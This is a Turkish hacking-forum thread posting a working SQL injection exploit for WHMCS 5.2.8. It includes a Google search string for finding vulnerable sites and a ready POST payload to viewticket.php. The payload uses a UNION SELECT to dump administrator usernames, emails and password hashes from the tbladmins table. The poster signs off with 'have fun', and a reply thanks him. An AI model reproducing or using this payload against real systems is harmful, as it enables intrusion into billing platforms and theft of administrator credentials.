Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WHMCS 5.2.8 SQL Enjeksiyon Açığı
#1
Kod:
# Exploitin Adı : WHMCS 5.2.8 SQL Injection
# Google Arama Kodu: "powered by WHMCS"
# Satıcı Anasayfası: http://www.whmcs.com/
# Açıktan etkilenen versiyon: 5.2.8
# Windows ve Linux İşletim Sistemlerinde test edilmiştir.

Açık olan dosya adı =>  /includes/dbfunctions.php

POC:

select_query() function is vulnerable due to Register Globals

Örnek =>

/whmcs/viewticket.php

POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#


İyi Eğlenceler :)
www.deccal.org


Beğenenler:
#2
Eline sağlık
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 11 192 30-11-2016, Saat: 16:56
Son Yorum: xApocalypse
  Website by Raw Marketing Editor Asset Dosya Yükleme Açığı KingSkrupellos 7 114 30-11-2016, Saat: 08:48
Son Yorum: the_zizil
  Natural Software CMS Yönetici Atlatma Açığı KingSkrupellos 7 123 30-11-2016, Saat: 02:56
Son Yorum: 0xfans
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 105 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 10 165 27-11-2016, Saat: 11:37
Son Yorum: R3D
Anahtar Kelimeler

WHMCS 5.2.8 SQL Enjeksiyon Açığı indir, WHMCS 5.2.8 SQL Enjeksiyon Açığı Videosu, WHMCS 5.2.8 SQL Enjeksiyon Açığı Online izle, WHMCS 5.2.8 SQL Enjeksiyon Açığı Bedava indir, WHMCS 5.2.8 SQL Enjeksiyon Açığı Yükle, WHMCS 5.2.8 SQL Enjeksiyon Açığı Hakkında, WHMCS 5.2.8 SQL Enjeksiyon Açığı Nedir, WHMCS 5.2.8 SQL Enjeksiyon Açığı Free indir, WHMCS 5.2.8 SQL Enjeksiyon Açığı Oyunu, WHMCS 5.2.8 SQL Enjeksiyon Açığı Download


1 Ziyaretçi